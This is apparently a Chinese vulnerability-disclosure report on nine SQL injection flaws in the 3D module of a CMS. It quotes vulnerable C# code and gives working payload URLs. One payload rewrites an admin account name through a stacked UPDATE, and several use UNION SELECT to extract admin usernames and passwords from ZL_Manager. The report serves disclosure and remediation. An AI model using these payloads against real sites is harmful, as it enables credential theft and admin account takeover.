文件目录3D
注入1
文件/3D/1sMail.aspx 问题阐述 ShopID
测试:
代码片段如下
虽然 Select_Where方法调用的存储过程进行了参数化 但是咱们看如下代码片段
看存储过程 PR_Duser_Select_Where
显然程序中的参数化没起到任何作用
结果如下图

注:此处还有一个地方有注入(未利用)就是页面的DropDownList3下拉菜单的下拉事件
代码片段如下
这里直接获取的this.DropDownList3.SelectedValue的值此值可在UI中修改 GetABC方法代码片段如下
虽然页面中未显示DropDownList3这个控件页未成功利用 但是这个地方代码 希望官方还是能修改一下
注入2:
文件/3D/ShowForm.aspx 问题参数shopid
测试:
如下代码片段
还是Select_Where方法出现问题
还是和第一个注入过程是一样的调取的存储过程也是一样的

注入3:
文件 3d/InDoor.aspx 也就是showform。aspx中嵌入的的页面
http://192.168.10.19:9992/3d/InDoor.aspx?ShopID=100;update/**/ ZL_Manager set AdminName='WooyunDamo' where/**/ AdminID=1--
同样执行的同一个存储过程
结果如下图

注入4
文件:3d/InsertContext.aspx?type=Suser
个人原因 没有继续 但是看代码
YY的想法:测试方式 form提交 然后转码 base.Server.UrlDecode(text); 然后FromBase64String(text);解码 然后解码之后的数据应该是介个样子的
理论数据 aaaa$bbbbb$ccccc$ddddd 然后代码过程则是根据$进行截取并且去除$ 那么这里控制array[1] 页就是bbbbb的值即可完成注入
调取的还是原来的方法 还是熟悉的存储过程
小弟本地未亲测 但是这个地方代码 希望官方还是能修改一下
注入5:
文件3D/showBgRe.aspx
http://192.168.10.19:9992/3d/showBgRe.aspx?scen=100&ShopID=100 union/**/ all select/**/ STUFF(adminPassword , 1, 0, AdminName),2,'3','4','5','6','7','8','9','aa',11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager
还是原来的方法 还是熟悉的存储过程
结果如下图

注入6:
文件 3D/ShowChat.aspx
http://192.168.10.19:9992/3d/ShowChat.aspx?type=2&uid=100 union/**/ all select/**/ STUFF(adminPassword , 1, 0, AdminName),2,'3','4','5','6','7','8','9','aa',11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager
还是原来的方法 还是熟悉的存储过程
结果如下图

注入7:
文件3D/ShowInfo.aspx 问题参数 ShopID
http://192.168.10.19:9992/3d/ShowInfo.aspx?ShopID=100 union/**/ all select/**/ STUFF(adminPassword , 1, 0, AdminName),2,'3','4','5','6','7','8','9','aa',11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager
还是原来的方法 还是熟悉的存储过程
图只是用来显示密码用的给WOOYUN省空间就不上传了
注入8:
文件3D/ShowNote.aspx 问题参数 ShopID
http://192.168.10.19:9992/3d/ShowNote.aspx?ShopID=100 union/**/ all select/**/ STUFF(adminPassword , 1, 0, AdminName),2,'3','4','5','6','7','8','9','aa',11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager
还是原来的方法 还是熟悉的存储过程
图只是用来显示密码用的给WOOYUN省空间就不上传了
注入9:
文件3D/UpdateCoordinate.aspx
代码片段如下
if (base.Request.QueryString["type"] == "shopuser")
{
this.ShopUser(base.Request.Form.ToString());
this.UpdateDate();
}
private void ShopUser(string shopid)
{
if (shopid != "")
{
DataTable dataTable = this.bds.Select_Where(" D_ShopID=" + shopid, " D_ShowUserid, D_Remark", "");
string str = "false";
StringBuilder stringBuilder = new StringBuilder();
if (dataTable.Rows.Count > 0)
{
.........
}
}
}
YY想法: 问题方法Select_Where 存储过程 PR_DShowUser_Select_Where 利用方法还是一样 不过这次注意参数是Request.Form.ToString()